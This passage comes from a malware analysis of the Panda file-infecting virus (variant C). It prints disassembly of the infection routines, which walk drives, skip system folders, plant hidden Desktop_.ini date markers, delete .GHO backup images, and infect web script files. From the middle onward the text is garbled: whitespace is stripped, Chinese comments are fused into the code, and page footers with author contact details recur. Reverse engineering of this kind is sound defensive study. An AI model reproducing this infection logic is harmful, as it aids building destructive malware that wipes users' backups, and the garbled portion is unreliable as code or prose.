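Note the two edge cases the loop bounds create: a file with no zero byte at all is treated entirely as marker (Delete with Index 0 then changes nothing), and a file ending in a zero byte has an empty marker and is taken for the bare body, which is why a PE with normal section padding is never mistaken for a host.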
Next, let us look at the infection part. This is the "core" of the virus: without it the virus would be no more than a trojan downloader :). The infection module consists of the following pieces:

CODE:0040CAD0 Infect          proc near
CODE:0040CAD0                 call    CThread_Infect_Drivers
CODE:0040CAD5                 call    CTimer_WITE_AUTORUNINF
CODE:0040CADA                 mov     ax, 0Ah
CODE:0040CADE                 call    Infect_NetWork
CODE:0040CAE3                 retn
CODE:0040CAE3 Infect          endp

Each sub-module is analysed below.

CThread_Infect_Drivers:
CODE:0040A1F6                 mov     fs:[eax], esp
CODE:0040A1F9                 lea     eax, [ebp+szDrivers]
CODE:0040A1FC                 call    GetValid_Root   ; get the list of valid drives
CODE:0040A201                 mov     eax, [ebp+szDrivers]
CODE:0040A204                 call    unKnow
CODE:0040A209                 mov     esi, eax
...
                              lea     edx, [ebp+var_10]
CODE:0040A233                 mov     eax, offset aA  ; "a"
CODE:0040A238                 call    upcase
CODE:0040A23D                 mov     eax, [ebp+var_10]
CODE:0040A240                 pop     edx
CODE:0040A241                 call    @System@@LStrPos$qqrv
CODE:0040A246                 test    eax, eax
CODE:0040A248                 jnz     short loc_40A2A6
CODE:0040A24A                 lea     eax, [ebp+var_18]
CODE:0040A24D                 mov     edx, [ebp+szDrivers]
CODE:0040A250                 mov     dl, [edx+ebx-1]
CODE:0040A254                 call    @System@@LStrFromChar$qqrr17System@AnsiStringc
CODE:0040A259                 mov     eax, [ebp+var_18]
CODE:0040A25C                 lea     edx, [ebp+var_14]
CODE:0040A25F                 call    upcase
CODE:0040A264                 mov     eax, [ebp+var_14]
CODE:0040A267                 push    eax
CODE:0040A268                 lea     edx, [ebp+var_1C]
CODE:0040A26B                 mov     eax, offset aB  ; "b"
CODE:0040A270                 call    upcase
CODE:0040A275                 mov     eax, [ebp+var_1C]
CODE:0040A278                 pop     edx
CODE:0040A279                 call    @System@@LStrPos$qqrv
CODE:0040A27E                 test    eax, eax        ; is this drive A or B? if so, it is not infected
CODE:0040A280                 jnz     short loc_40A2A6
CODE:0040A282                 lea     eax, [ebp+var_20]
CODE:0040A285                 mov     edx, [ebp+szDrivers]
CODE:0040A288                 mov     dl, [edx+ebx-1]
CODE:0040A28C                 call    @System@@LStrFromChar$qqrr17System@AnsiStringc
CODE:0040A291                 lea     eax, [ebp+var_20]
CODE:0040A294                 mov     edx, offset asc_40A2FC ; ":\\"
CODE:0040A299                 call    @System@@LStrCat$qqrv
CODE:0040A29E                 mov     eax, [ebp+var_20]
CODE:0040A2A1                 call    Infect_Path
CODE:0040A2A6 loc_40A2A6:                             ; CODE XREF: Thread_Infect_Valid_Drivers+6Cj
CODE:0040A2A6                                         ; Thread_Infect_Valid_Drivers+A4j
CODE:0040A2A6                 dec     ebx
CODE:0040A2A7                 test    ebx, ebx
CODE:0040A2A9                 jnz     loc_40A212
...
Infect_Path is the actual file-infection routine. Let us go in (the code is long, so be patient ^_^):

Infect_Path:
CODE:004091F8 ; =============== S U B R O U T I N E =======================================
CODE:004091F8 ; Attributes: bp-based frame
CODE:004091F8 Infect_Path     proc near               ; CODE XREF: Scan_Folders+8AAp
CODE:004091F8                                         ; Infect_Path+915p ...
CODE:004091F8 var_2EC         = dword ptr -2ECh
CODE:004091F8 var_2E8         = dword ptr -2E8h
CODE:004091F8 var_2E4         = dword ptr -2E4h
CODE:004091F8 var_2E0         = dword ptr -2E0h
...
CODE:00409262 loc_409262:                             ; CODE XREF: Infect_Path+5Bj
CODE:00409262                 lea     eax, [ebp+var_178]
CODE:00409268                 mov     ecx, offset a_  ; "*.*"
CODE:0040926D                 mov     edx, [ebp+szFolderName] ; enumerate every file in the folder
CODE:00409270                 call    @System@@LStrCat3$qqrv
CODE:00409275                 mov     eax, [ebp+var_178]
CODE:0040927B                 lea     ecx, [ebp+var_164]
CODE:00409281                 mov     edx, 3Fh        ; faAnyFile
CODE:00409286                 call    @Sysutils@FindFirst$qqrx17System@AnsiStringir19Sysutils@TSearchRec
CODE:0040928B                 test    eax, eax
CODE:0040928D                 jnz     close_Fnd
CODE:00409293 Loop_FndFile:                           ; CODE XREF: Infect_Path+C63j
CODE:00409293                 mov     eax, [ebp+FNDDATA.nFileAttrib]
CODE:00409299                 and     eax, 10h
CODE:0040929C                 cmp     eax, FILE_ATTRIBUTE_DIRECTORY
CODE:0040929F                 jnz     IsFileWay
CODE:004092A5                 mov     eax, [ebp+FNDDATA.pFileName]
CODE:004092AB                 cmp     byte ptr [eax], '.'
CODE:004092AE                 jz      IsFileWay
CODE:004092B4 ; --- begin of collapsed area "Cmp is that sp dir" (4C2h bytes) ---
CODE:004092B4                 lea     edx, [ebp+var_17C] ; is this one of the special folders? if so, it is not infected
CODE:004092BA                 mov     eax, offset aWindows_0 ; "WINDOWS"
CODE:004092BF                 call    upcase
CODE:004092C4                 mov     eax, [ebp+var_17C]
CODE:004092CA                 push    eax
CODE:004092CB                 lea     edx, [ebp+var_180]
CODE:004092D1                 mov     eax, [ebp+FNDDATA.pFileName]
CODE:004092D7                 call    upcase
CODE:004092DC                 mov     edx, [ebp+var_180]
CODE:004092E2                 pop     eax
CODE:004092E3                 call    @System@@LStrCmp$qqrv
CODE:004092E8                 jz      Fnd_Next_File
CODE:004092EE                 lea     edx, [ebp+var_184]
CODE:004092F4                 mov     eax, offset aWinnt_0 ; "WINNT"
CODE:004092F9                 call    upcase
CODE:004092FE                 mov     eax, [ebp+var_184]
CODE:00409304                 push    eax
CODE:00409305                 lea     edx, [ebp+var_188]
CODE:0040930B                 mov     eax, [ebp+FNDDATA.pFileName]
CODE:00409311                 call    upcase
CODE:00409316                 mov     edx, [ebp+var_188]
CODE:0040931C                 pop     eax
CODE:0040931D                 call    @System@@LStrCmp$qqrv
CODE:00409322                 jz      Fnd_Next_File

The same twelve instructions repeat, with the two temporaries advancing by 4 bytes each time (var_18C/var_190, var_194/var_198, and so on), for each of the remaining names; the ranges below give the first instruction and the final jz Fnd_Next_File of each block:

CODE:00409328 .. 0040935C   "system32"
CODE:00409362 .. 00409396   "Documents and Settings"
CODE:0040939C .. 004093D0   "System Volume Information"
CODE:004093D6 .. 0040940A   "Recycled"
CODE:00409410 .. 00409444   "Windows NT"
CODE:0040944A .. 0040947E   "WindowsUpdate"
CODE:00409484 .. 004094B8   "Windows Media Player"
CODE:004094BE .. 004094F2   "Outlook Express"
CODE:004094F8 .. 0040952C   "Internet Explorer"
CODE:00409532 .. 00409566   "NetMeeting"
CODE:0040956C .. 004095A0   "Common Files"
CODE:004095A6 .. 004095DA   "ComPlus Applications"
CODE:004095E0 .. 00409614   "Common Files"  (compared a second time)
CODE:0040961A .. 0040964E   "Messenger"
CODE:00409654 .. 00409688   "InstallShield Installation Information"
CODE:0040968E .. 004096C2   "MSN"
CODE:004096C8 .. 004096FC   "Microsoft Frontpage"
CODE:00409702 .. 00409736   "Movie Maker"
CODE:0040973C .. 00409770   "MSN Gamin Zone"  (sic: the virus's own string)

Every comparison is made after converting both sides to upper case, so the skip list is case-insensitive.

CODE:00409770 ; --- end of collapsed area "Cmp is that sp dir" ---
CODE:00409776                 push    [ebp+szFolderName] ; not a special folder: execution continues here
CODE:00409779                 push    [ebp+FNDDATA.pFileName]
CODE:0040977F                 push    offset aDesktop__ini_0 ; "\\Desktop_.ini"
CODE:00409784                 lea     eax, [ebp+var_224]
CODE:0040978A                 mov     edx, 3
CODE:0040978F                 call    @System@@LStrCatN$qqrv
CODE:00409794                 mov     eax, [ebp+var_224]
CODE:0040979A                 call    @Sysutils@FileExists$qqrx17System@AnsiString
CODE:0040979F                 test    al, al
CODE:004097A1                 jz      DeskTopFileNotExistWay ; no Desktop_.ini in this folder
CODE:004097A7                 push    [ebp+szFolderName]
CODE:004097AA                 push    [ebp+FNDDATA.pFileName]
CODE:004097B0                 push    offset aDesktop__ini_0 ; "\\Desktop_.ini"
CODE:004097B5                 lea     eax, [ebp+var_228]
CODE:004097BB                 mov     edx, 3
CODE:004097C0                 call    @System@@LStrCatN$qqrv
CODE:004097C5                 mov     eax, [ebp+var_228]
CODE:004097CB                 lea     edx, [ebp+var_8]
CODE:004097CE                 call    ReadFileToMem   ; read the existing Desktop_.ini
CODE:004097D3                 lea     eax, [ebp+SystemTime]
CODE:004097D9                 push    eax             ; lpSystemTime
CODE:004097DA                 call    GetLocalTime
CODE:004097DF                 lea     edx, [ebp+var_22C]
CODE:004097E5                 movzx   eax, [ebp+SystemTime.wYear]
CODE:004097EC                 call    sub_40587C      ; number to string
CODE:004097F1                 push    [ebp+var_22C]
CODE:004097F7                 push    offset asc_40A0F4 ; separator string (its characters are not legible in this copy)
CODE:004097FC                 lea     edx, [ebp+var_230]
CODE:00409802                 movzx   eax, [ebp+SystemTime.wMonth]
CODE:00409809                 call    sub_40587C
CODE:0040980E                 push    [ebp+var_230]
CODE:00409814                 push    offset asc_40A0F4
CODE:00409819                 lea     edx, [ebp+var_234]
CODE:0040981F                 movzx   eax, [ebp+SystemTime.wDay]
CODE:00409826                 call    sub_40587C
CODE:0040982B                 push    [ebp+var_234]
CODE:00409831                 lea     eax, [ebp+var_C]
CODE:00409834                 mov     edx, 5
CODE:00409839                 call    @System@@LStrCatN$qqrv ; year + sep + month + sep + day
CODE:0040983E                 mov     eax, [ebp+var_8]
CODE:00409841                 mov     edx, [ebp+var_C]
CODE:00409844                 call    @System@@LStrCmp$qqrv
CODE:00409849                 jnz     short ReWrite_File ; if the file content equals today's date the virus
CODE:00409849                                         ; considers the folder already infected
CODE:0040984B                 push    [ebp+szFolderName]
CODE:0040984E                 push    [ebp+FNDDATA.pFileName]
CODE:00409854                 push    offset asc_40A100 ; "感染过,跳过!" ("already infected, skipping!")
CODE:00409859                 lea     eax, [ebp+var_238]
CODE:0040985F                 mov     edx, 3
CODE:00409864                 call    @System@@LStrCatN$qqrv
CODE:00409869                 mov     eax, [ebp+var_238]
CODE:0040986F                 mov     edx, offset aCTest_txt ; "c:\\test.txt"
CODE:00409874                 call    @Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1 ; looks like a leftover debug trace to c:\test.txt
CODE:00409879                 lea     eax, [ebp+var_23C]
CODE:0040987F                 mov     ecx, [ebp+FNDDATA.pFileName]
CODE:00409885                 mov     edx, [ebp+szFolderName]
CODE:00409888                 call    @System@@LStrCat3$qqrv
CODE:0040988D                 mov     eax, [ebp+var_23C]
CODE:00409893                 call    Scan_Folders    ; recurse into the sub-folder
CODE:00409898                 jmp     Fnd_Next_File
CODE:0040989D ReWrite_File:                           ; CODE XREF: Infect_Path+651j
CODE:0040989D                 push    FILE_ATTRIBUTE_NORMAL ; the content is not today's date: rewrite the file with today's date
CODE:004098A2                 push    [ebp+szFolderName]
CODE:004098A5                 push    [ebp+FNDDATA.pFileName]
CODE:004098AB                 push    offset aDesktop__ini_0 ; "\\Desktop_.ini"
CODE:004098B0                 lea     eax, [ebp+var_240]
CODE:004098B6                 mov     edx, 3
CODE:004098BB                 call    @System@@LStrCatN$qqrv
CODE:004098C0                 mov     eax, [ebp+var_240]
CODE:004098C6                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004098CB                 push    eax             ; lpFileName
CODE:004098CC                 call    SetFileAttributesA ; make the file writable again
CODE:004098D1                 push    1               ; dwMilliseconds
CODE:004098D3                 call    Sleep
CODE:004098D8                 lea     eax, [ebp+SystemTime]
CODE:004098DE                 push    eax             ; lpSystemTime
CODE:004098DF                 call    GetLocalTime
CODE:004098E4                 lea     edx, [ebp+var_244]
CODE:004098EA                 movzx   eax, [ebp+SystemTime.wYear]
CODE:004098F1                 call    sub_40587C
CODE:004098F6                 push    [ebp+var_244]
CODE:004098FC                 push    offset asc_40A0F4
CODE:00409901                 lea     edx, [ebp+var_248]
CODE:00409907                 movzx   eax, [ebp+SystemTime.wMonth]
CODE:0040990E                 call    sub_40587C
CODE:00409913                 push    [ebp+var_248]
CODE:00409919                 push    offset asc_40A0F4
CODE:0040991E                 lea     edx, [ebp+var_24C]
CODE:00409924                 movzx   eax, [ebp+SystemTime.wDay]
CODE:0040992B                 call    sub_40587C
CODE:00409930                 push    [ebp+var_24C]
CODE:00409936                 lea     eax, [ebp+var_C]
CODE:00409939                 mov     edx, 5
CODE:0040993E                 call    @System@@LStrCatN$qqrv
CODE:00409943                 push    [ebp+szFolderName]
CODE:00409946                 push    [ebp+FNDDATA.pFileName]
CODE:0040994C                 push    offset aDesktop__ini_0 ; "\\Desktop_.ini"
CODE:00409951                 lea     eax, [ebp+var_250]
CODE:00409957                 mov     edx, 3
CODE:0040995C                 call    @System@@LStrCatN$qqrv
CODE:00409961                 mov     edx, [ebp+var_250]
CODE:00409967                 mov     eax, [ebp+var_C]
CODE:0040996A                 call    @Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1_0 ; write the date string into Desktop_.ini
CODE:0040996F                 mov     edx, offset aCTest_txt ; "c:\\test.txt"
CODE:00409974                 mov     eax, offset aFIV ; "时间不对,建立一个!" ("date is wrong, creating a new one!")
CODE:00409979                 call    @Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1
CODE:0040997E                 push    7               ; FILE_ATTRIBUTE_READONLY | HIDDEN | SYSTEM
CODE:00409980                 push    [ebp+szFolderName]
CODE:00409983                 push    [ebp+FNDDATA.pFileName]
CODE:00409989                 push    offset aDesktop__ini_0 ; "\\Desktop_.ini"
CODE:0040998E                 lea     eax, [ebp+var_254]
CODE:00409994                 mov     edx, 3
CODE:00409999                 call    @System@@LStrCatN$qqrv
CODE:0040999E                 mov     eax, [ebp+var_254]
CODE:004099A4                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004099A9                 push    eax             ; lpFileName
CODE:004099AA                 call    SetFileAttributesA
CODE:004099AF                 push    1               ; dwMilliseconds
CODE:004099B1                 call    Sleep
CODE:004099B6                 jmp     loc_409AF3
CODE:004099BB DeskTopFileNotExistWay:                 ; CODE XREF: Infect_Path+5A9j
CODE:004099BB                 push    80h             ; FILE_ATTRIBUTE_NORMAL
CODE:004099C0                 push    [ebp+szFolderName]
CODE:004099C3                 push    [ebp+FNDDATA.pFileName]
CODE:004099C9                 push    offset aDesktop__ini_0 ; "\\Desktop_.ini"
CODE:004099CE                 lea     eax, [ebp+var_258]
CODE:004099D4                 mov     edx, 3
CODE:004099D9                 call    @System@@LStrCatN$qqrv
CODE:004099DE                 mov     eax, [ebp+var_258]
CODE:004099E4                 call    @System@@LStrToPChar$qqrx17System@AnsiString
CODE:004099E9                 push    eax             ; lpFileName
CODE:004099EA                 call    SetFileAttributesA
CODE:004099EF                 push    1               ; dwMilliseconds
CODE:004099F1                 call    Sleep
CODE:004099F6                 lea     eax, [ebp+SystemTime]
CODE:004099FC                 push    eax             ; lpSystemTime
CODE:004099FD                 call    GetLocalTime
CODE:00409A02                 lea     edx, [ebp+var_25C]
CODE:00409A08                 movzx   eax, [ebp+SystemTime.wYear]
CODE:00409A0F                 call    sub_40587C
CODE:00409A14                 push    [ebp+var_25C]
CODE:00409A1A                 push    offset asc_40A0F4
CODE:00409A1F                 lea     edx, [ebp+var_260]
CODE:00409A25                 movzx   eax, [ebp+SystemTime.wMonth]
CODE:00409A2C                 call    sub_40587C
CODE:00409A31                 push    [ebp+var_260]
CODE:00409A37                 push    offset asc_40A0F4
CODE:00409A3C                 lea     edx, [ebp+var_264]
CODE:00409A42                 movzx   eax, [ebp+SystemTime.wDay]
CODE:00409A49                 call    sub_40587C
CODE:00409A4E                 push    [ebp+var_264]
CODE:00409A54                 lea     eax, [ebp+var_C]
CODE:00409A57                 mov     edx, 5
CODE:00409A5C                 call    @System@@LStrCatN$qqrv
CODE:00409A61                 push    [ebp+szFolderName]
CODE:00409A64                 push    [ebp+FNDDATA.pFileName]
CODE:00409A6A                 push    offset aDesktop__ini_0 ; "\\Desktop_.ini"
ini"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十七CODE:00409A6Fleaeax,[ebp+var_268]CODE:00409A75movedx,3CODE:00409A7Acall@System@@LStrCatN$qqrvCODE:00409A7Fmovedx,[ebp+var_268]CODE:00409A85moveax,[ebp+var_C]CODE:00409A88call@Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1_0CODE:00409A8Dpush[ebp+szFolderName]CODE:00409A90push[ebp+FNDDATA.
pFileName]CODE:00409A96pushoffsetaDesktop__iniIV"\\Desktop_.
ini没有找到,建立一个!
"CODE:00409A9Bleaeax,[ebp+var_26C]CODE:00409AA1movedx,3CODE:00409AA6call@System@@LStrCatN$qqrvCODE:00409AABmoveax,[ebp+var_26C]CODE:00409AB1movedx,offsetaCTest_txt"c:\\test.
txt"CODE:00409AB6call@Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1CODE:00409ABBpush7CODE:00409ABDpush[ebp+szFolderName]CODE:00409AC0push[ebp+FNDDATA.
pFileName]CODE:00409AC6pushoffsetaDesktop__ini_0dwFileAttributesCODE:00409ACBleaeax,[ebp+var_270]CODE:00409AD1movedx,3CODE:00409AD6call@System@@LStrCatN$qqrvCODE:00409ADBmoveax,[ebp+var_270]CODE:00409AE1call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:00409AE6pusheaxlpFileNameCODE:00409AE7callSetFileAttributesACODE:00409AECpush1dwMillisecondsCODE:00409AEEcallSleepCODE:00409AF3CODE:00409AF3loc_409AF3:CODEXREF:Infect_Path+7BEjInfect_Path+7BEjCODE:00409AF3leaeax,[ebp+var_274]CODE:00409AF9movecx,[ebp+FNDDATA.
pFileName]CODE:00409AFFmovedx,[ebp+szFolderName]CODE:00409B02call@System@@LStrCat3$qqrvCODE:00409B07moveax,[ebp+var_274]CODE:00409B0DcallInfect_PathCODE:00409B12jmpFndNextFileCODE:00409B17CODE:00409B17熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十八CODE:00409B17IsFileWay:CODEXREF:Infect_Path+A7jInfect_Path+A7jCODE:00409B17Infect_Path+B6jInfect_Path+B6jCODE:00409B17moveax,[ebp+FNDDATA.
pFileName]CODE:00409B1Dcmpbyteptr[eax],'.
'CODE:00409B20jzFndNextFile如果是文件名为".
"则跳去查找下一文件CODE:00409B26leaedx,[ebp+var_27C]CODE:00409B2Cmoveax,[ebp+FNDDATA.
pFileName]CODE:00409B32callGetExtName获取程序扩展名CODE:00409B37moveax,[ebp+var_27C]CODE:00409B3Dleaedx,[ebp+var_278]CODE:00409B43callUPCASECODE:00409B48moveax,[ebp+var_278]CODE:00409B4Emovedx,offsetaGho"GHO"CODE:00409B53call@System@@LStrCmp$qqrv这里危害比较大,可能导致中毒后只能重装系统CODE:00409B58jnzshortNext_409B7FCODE:00409B5Aleaeax,[ebp+var_280]CODE:00409B60movecx,[ebp+FNDDATA.
pFileName]CODE:00409B66movedx,[ebp+szFolderName]CODE:00409B69call@System@@LStrCat3$qqrvCODE:00409B6Emoveax,[ebp+var_280]CODE:00409B74call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:00409B79pusheaxlpFileNameCODE:00409B7AcallDeleteFileA如果是后缀名为GHO则删除该文件CODE:00409B7FCODE:00409B7FNext_409B7F:CODEXREF:Infect_Path+960jInfect_Path+960jCODE:00409B7Fleaeax,[ebp+szFullFileName]CODE:00409B85movecx,[ebp+FNDDATA.
pFileName]CODE:00409B8Bmovedx,[ebp+szFolderName]CODE:00409B8Ecall@System@@LStrCat3$qqrvCODE:00409B93moveax,[ebp+szFullFileName]CODE:00409B99callDelphi_GetFileSizeCODE:00409B9Ecmpeax,10485760CODE:00409BA3jgeFndNextFile如果文件大于10mb则不进行感染操作CODE:00409BA9leaedx,[ebp+var_288]CODE:00409BAFmoveax,offsetaSetup_exe"setup.
exe"CODE:00409BB4callupcase熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十九CODE:00409BB9moveax,[ebp+var_288]CODE:00409BBFpusheaxCODE:00409BC0leaedx,[ebp+var_28C]CODE:00409BC6moveax,[ebp+FNDDATA.
pFileName]CODE:00409BCCcallupcaseCODE:00409BD1movedx,[ebp+var_28C]CODE:00409BD7popeaxCODE:00409BD8call@System@@LStrCmp$qqrvCODE:00409BDDjzFnd_Next_File文件名为setup.
exe则跳去查找下一文件CODE:00409BE3leaedx,[ebp+var_294]CODE:00409BE9moveax,[ebp+FNDDATA.
pFileName]CODE:00409BEFcallGetExtNameCODE:00409BF4moveax,[ebp+var_294]CODE:00409BFAleaedx,[ebp+var_290]CODE:00409C00callupcaseCODE:00409C05moveax,[ebp+var_290]CODE:00409C0BpusheaxCODE:00409C0Cleaedx,[ebp+var_298]CODE:00409C12moveax,offsetaHtm"htm"CODE:00409C17callupcaseCODE:00409C1Cmovedx,[ebp+var_298]CODE:00409C22popeaxCODE:00409C23call@System@@LStrCmp$qqrvCODE:00409C28jnzshortloc_409C49CODE:00409C2Aleaeax,[ebp+var_29C]CODE:00409C30movecx,[ebp+FNDDATA.
pFileName]CODE:00409C36movedx,[ebp+szFolderName]CODE:00409C39call@System@@LStrCat3$qqrvCODE:00409C3Emoveax,[ebp+var_29C]CODE:00409C44callInfect_Script_File_Proc感染脚本文件CODE:00409C49CODE:00409C49loc_409C49:CODEXREF:Infect_Path+A30jInfect_Path+A30jCODE:00409C49leaedx,[ebp+var_2A4]CODE:00409C4Fmoveax,[ebp+FNDDATA.
pFileName]CODE:00409C55callGetExtNameCODE:00409C5Amoveax,[ebp+var_2A4]CODE:00409C60leaedx,[ebp+var_2A0]CODE:00409C66callupcaseCODE:00409C6Bmoveax,[ebp+var_2A0]CODE:00409C71pusheax熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十CODE:00409C72leaedx,[ebp+var_2A8]CODE:00409C78moveax,offsetaHtml"html"CODE:00409C7DcallupcaseCODE:00409C82movedx,[ebp+var_2A8]CODE:00409C88popeaxCODE:00409C89call@System@@LStrCmp$qqrvCODE:00409C8Ejnzshortloc_409CAFCODE:00409C90leaeax,[ebp+var_2AC]CODE:00409C96movecx,[ebp+FNDDATA.
pFileName]CODE:00409C9Cmovedx,[ebp+szFolderName]CODE:00409C9Fcall@System@@LStrCat3$qqrvCODE:00409CA4moveax,[ebp+var_2AC]CODE:00409CAAcallInfect_Script_File_ProcCODE:00409CAFCODE:00409CAFloc_409CAF:CODEXREF:Infect_Path+A96jInfect_Path+A96jCODE:00409CAFleaedx,[ebp+var_2B4]CODE:00409CB5moveax,[ebp+FNDDATA.
pFileName]CODE:00409CBBcallGetExtNameCODE:00409CC0moveax,[ebp+var_2B4]CODE:00409CC6leaedx,[ebp+var_2B0]CODE:00409CCCcallupcaseCODE:00409CD1moveax,[ebp+var_2B0]CODE:00409CD7pusheaxCODE:00409CD8leaedx,[ebp+var_2B8]CODE:00409CDEmoveax,offsetaAsp"asp"CODE:00409CE3callupcaseCODE:00409CE8movedx,[ebp+var_2B8]CODE:00409CEEpopeaxCODE:00409CEFcall@System@@LStrCmp$qqrvCODE:00409CF4jnzshortloc_409D15CODE:00409CF6leaeax,[ebp+var_2BC]CODE:00409CFCmovecx,[ebp+FNDDATA.
pFileName]CODE:00409D02movedx,[ebp+szFolderName]CODE:00409D05call@System@@LStrCat3$qqrvCODE:00409D0Amoveax,[ebp+var_2BC]CODE:00409D10callInfect_Script_File_ProcCODE:00409D15CODE:00409D15loc_409D15:CODEXREF:Infect_Path+AFCjInfect_Path+AFCjCODE:00409D15leaedx,[ebp+var_2C4]CODE:00409D1Bmoveax,[ebp+FNDDATA.
pFileName]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十一CODE:00409D21callGetExtNameCODE:00409D26moveax,[ebp+var_2C4]CODE:00409D2Cleaedx,[ebp+var_2C0]CODE:00409D32callupcaseCODE:00409D37moveax,[ebp+var_2C0]CODE:00409D3DpusheaxCODE:00409D3Eleaedx,[ebp+var_2C8]CODE:00409D44moveax,offsetaPhp"php"CODE:00409D49callupcaseCODE:00409D4Emovedx,[ebp+var_2C8]CODE:00409D54popeaxCODE:00409D55call@System@@LStrCmp$qqrvCODE:00409D5Ajnzshortloc_409D7BCODE:00409D5Cleaeax,[ebp+var_2CC]CODE:00409D62movecx,[ebp+FNDDATA.
pFileName]CODE:00409D68movedx,[ebp+szFolderName]CODE:00409D6Bcall@System@@LStrCat3$qqrvCODE:00409D70moveax,[ebp+var_2CC]CODE:00409D76callInfect_Script_File_ProcCODE:00409D7BCODE:00409D7Bloc_409D7B:CODEXREF:Infect_Path+B62jInfect_Path+B62jCODE:00409D7Bleaedx,[ebp+var_2D4]CODE:00409D81moveax,[ebp+FNDDATA.
pFileName]CODE:00409D87callGetExtNameCODE:00409D8Cmoveax,[ebp+var_2D4]CODE:00409D92leaedx,[ebp+var_2D0]CODE:00409D98callupcaseCODE:00409D9Dmoveax,[ebp+var_2D0]CODE:00409DA3pusheaxCODE:00409DA4leaedx,[ebp+var_2D8]CODE:00409DAAmoveax,offsetaJsp"jsp"CODE:00409DAFcallupcaseCODE:00409DB4movedx,[ebp+var_2D8]CODE:00409DBApopeaxCODE:00409DBBcall@System@@LStrCmp$qqrvCODE:00409DC0jnzshortloc_409DE1CODE:00409DC2leaeax,[ebp+var_2DC]CODE:00409DC8movecx,[ebp+FNDDATA.
pFileName]CODE:00409DCEmovedx,[ebp+szFolderName]CODE:00409DD1call@System@@LStrCat3$qqrvCODE:00409DD6moveax,[ebp+var_2DC]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十二CODE:00409DDCcallInfect_Script_File_ProcCODE:00409DE1CODE:00409DE1loc_409DE1:CODEXREF:Infect_Path+BC8jInfect_Path+BC8jCODE:00409DE1leaedx,[ebp+var_2E4]CODE:00409DE7moveax,[ebp+FNDDATA.
pFileName]CODE:00409DEDcallGetExtNameCODE:00409DF2moveax,[ebp+var_2E4]CODE:00409DF8leaedx,[ebp+var_2E0]CODE:00409DFEcallupcaseCODE:00409E03moveax,[ebp+var_2E0]CODE:00409E09pusheaxCODE:00409E0Aleaedx,[ebp+var_2E8]CODE:00409E10moveax,offsetaAspx"aspx"CODE:00409E15callupcaseCODE:00409E1Amovedx,[ebp+var_2E8]CODE:00409E20popeaxCODE:00409E21call@System@@LStrCmp$qqrvCODE:00409E26jnzshortFndNextFileCODE:00409E28leaeax,[ebp+var_2EC]CODE:00409E2Emovecx,[ebp+FNDDATA.
pFileName]CODE:00409E34movedx,[ebp+szFolderName]CODE:00409E37call@System@@LStrCat3$qqrvCODE:00409E3Cmoveax,[ebp+var_2EC]CODE:00409E42callInfect_Script_File_ProcCODE:00409E47CODE:00409E47FndNextFile:CODEXREF:Infect_Path+91AjInfect_Path+91AjCODE:00409E47Infect_Path+928jInfect_Path+928j.
.
.
CODE:00409E47push14hdwMillisecondsCODE:00409E49callSleepCODE:00409E4ECODE:00409E4EFnd_Next_File:CODEXREF:Infect_Path+F0jInfect_Path+F0jCODE:00409E4EInfect_Path+12AjInfect_Path+12Aj.
.
.
CODE:00409E4Eleaeax,[ebp+var_164]CODE:00409E54call@Sysutils@FindNext$qqrr19Sysutils@TSearchRecCODE:00409E59testeax,eaxCODE:00409E5BjzLoop_FndFileCODE:00409E61CODE:00409E61close_Fnd:CODEXREF:Infect_Path+95jInfect_Path+95j熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十三CODE:00409E61leaeax,[ebp+var_164]CODE:00409E67call@Sysutils@FindClose$qqrr19Sysutils@TSearchRecCODE:00409E6Cxoreax,eaxCODE:00409E6EpopedxCODE:00409E6FpopecxCODE:00409E70popecxCODE:00409E71movfs:[eax],edxCODE:00409E74jmpshortloc_409E80CODE:00409E76CODE:00409E76CODE:00409E76loc_409E76:DATAXREF:Infect_Path+40oInfect_Path+40oCODE:00409E76jmp@System@@HandleAnyException$qqrvCODE:00409E7BCODE:00409E7Bcall@System@@DoneExcept$qqrvCODE:00409E80CODE:00409E80loc_409E80:CODEXREF:Infect_Path+C7CjInfect_Path+C7CjCODE:00409E80xoreax,eaxCODE:00409E82popedxCODE:00409E83popecxCODE:00409E84popecxCODE:00409E85movfs:[eax],edxCODE:00409E88pushoffsetloc_409EC3CODE:00409E8DCODE:00409E8Dloc_409E8D:CODEXREF:j_@System@@HandleFinally$qqrv_22+5jj_@System@@HandleFinally$qqrv_22+5jCODE:00409E8Dleaeax,[ebp+var_2EC]CODE:00409E93movedx,5EhCODE:00409E98call@System@@LStrArrayClr$qqrpviCODE:00409E9Dleaeax,[ebp+var_164]CODE:00409EA3movedx,off_407720CODE:00409EA9call@System@@FinalizeRecord$qqrpvt1CODE:00409EAEleaeax,[ebp+var_C]CODE:00409EB1movedx,3CODE:00409EB6call@System@@LStrArrayClr$qqrpviCODE:00409EBBretnCODE:00409EBBInfect_Pathendpsp=20hCODE:00409EBB到这里感染本地文件部分就结束了,其中Infect_Script_File_Proc只是简单的添加信息,因此我就不贴了.
In summary, the infection part works like this: it enumerates the usable partitions on the machine and then infects every script file on them (the script file types were listed in the overview). The virus does not infect the following folders:

  WINDOWS
  WINNT
  system32
  Documents and Settings
  System Volume Information
  Recycled
  Windows NT
  WindowsUpdate
  Windows Media Player
  Outlook Express
  Internet Explorer
  NetMeeting
  Common Files
  ComPlus Applications
  Messenger
  InstallShield Installation Information
  MSN
  Microsoft Frontpage
  Movie Maker
  MSN Gamin Zone

